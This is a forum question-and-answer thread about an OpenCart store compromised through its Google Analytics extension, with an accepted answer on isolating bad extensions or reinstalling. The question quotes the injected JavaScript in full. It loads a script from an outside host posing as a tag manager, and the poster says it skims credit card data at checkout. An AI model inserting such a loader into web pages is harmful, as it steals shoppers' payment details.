# Opencart site is hacked how to fix?

Tags: opencart

I found this in my google analytic config

var s = document.querySelector('head');
var sc = document.createElement('script');
sc.src= "https://tags-manager.com/gtags/script2?utm_referer=?utm_source=&utm_content=&utm_referer="+location.hostname;
s.appendChild(sc);

It's adding in checkout page other filed and sending credit card info

**Have you had a similar case?**

Answer (score 1, accepted):

Put the e-Shop in maintenance mode and start by disabling all `[OCMOD]` & `[VQMOD]`. See if that fixes your issues.
If **YES**, then start enabling one by one the `[OCMOD]` & `[VQMOD]` to see which one is causing the problem.
If **NO**, you should ask someone else to fix it for you. From my experience most of the times you should go to a new clean installation of **Opencart** (even maybe a new server if is compromised).

Comment: It's inserted inside the google analytics extension but from OC Admin everyone can paste what want.. I think someone user is hacked...